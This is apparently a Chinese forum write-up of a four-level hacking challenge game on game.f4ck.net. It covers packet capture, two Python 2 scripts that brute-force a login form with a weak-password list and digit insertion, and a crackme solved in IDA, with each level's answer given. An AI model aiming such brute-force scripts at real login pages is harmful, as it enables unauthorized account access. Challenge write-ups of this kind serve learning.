f4ck论坛的小游戏(灌水贴)

第一关，简单抓包

关于抓包python也有现成的库实现也比较简单，这里就不贴代码了

得到了第二关的地址
http://game.f4ck.net/jfasdsdlml.html




第二关，穷举密码，

用python写的时候，发现他有三个库  urllib urllib2 httplib

urllib与urllib2的区别

http://www.cnblogs.com/yuxc/archive/2011/08/01/2124073.html

httplib比较底层，是urllib和urllib2的支持

http://www.cnblogs.com/chenzehe/archive/2010/08/30/1812995.html

pyhton编码过程中遇到几个问题

（1）pyhton会读进来行尾的空格，要记住去掉

line=line.strip('\n')

（2）python使用中文

http://www.cnblogs.com/rollenholt/archive/2011/08/01/2123889.html

（3）都弄好了，结果又出现了python的那种蛋疼问题，跑不出结果
找出了结果是因为没有加这个头

'Content-Type': 'application/x-www-form-urlencoded'

原因看下面

http://www.cnblogs.com/mumue/archive/2012/05/24/2515984.html
http://caterpillar.onlyfun.net/Gossip/JavaScript/POST.html
http://tij.iteye.com/blog/434621

最后跑出
f9ck
http://game.f4ck.net/sjkad.html

# -*- coding: cp936 -*-
import urllib
import httplib
import urlparse


pass_file = open('weakpass.txt')
url = 'game.f4ck.net'
path = '/login2.php'
headers = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
           'Accept-Encoding':'gzip, deflate',
           'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
            'Cache-Control':'max-age=0',
            'Connection':'keep-alive',
            'Host':'game.f4ck.net',
            'Referer':'http://game.f4ck.net/jfasdsdlml.html',
            'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0',
            'Content-Type': 'application/x-www-form-urlencoded'
           }


for line in pass_file:
    params = urllib.urlencode({'log':'登录','password':line.strip('\n')})    
    try:
        connection = httplib.HTTPConnection(url)
        connection.request('POST',path,params,headers)
        response = connection.getresponse()
        if (response.status == 301):
            print line
            break
        print response.status, response.read() , params
    except Exception , e:
        print e


pass_file.close()

第三关：
就是稍微麻烦一点
检查返回长度就可以了，密码是f4ck9

# -*- coding: cp936 -*-
import urllib
import httplib
import urlparse


url = 'game.f4ck.net'
path = '/login.php'
password = 'f4ck'
headers = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
           'Accept-Encoding':'gzip, deflate',
           'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
            'Cache-Control':'max-age=0',
            'Connection':'keep-alive',
            'Host':'game.f4ck.net',
            'Referer':'http://game.f4ck.net/jfasdsdlml.html',
            'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0',
            'Content-Type': 'application/x-www-form-urlencoded'
           }


for i in range(0,5):
    for j in range(0,10):
        passwordX = password[:i]+str(j)+password[i:]
        params = urllib.urlencode({'log':'登录','password':passwordX})    
        try:
            connection = httplib.HTTPConnection(url)
            connection.request('POST',path,params,headers)
            response = connection.getresponse()
            print response.status, response.length, params
        except Exception , e:
            print e

第四关：
一个crackme

这里用了一个多判断的if ，用od分析起来比较麻烦，用IDA比较简单
密码是2500